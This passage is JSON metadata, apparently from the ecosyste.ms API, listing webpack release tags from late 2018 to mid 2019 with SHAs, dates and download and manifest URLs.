ack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_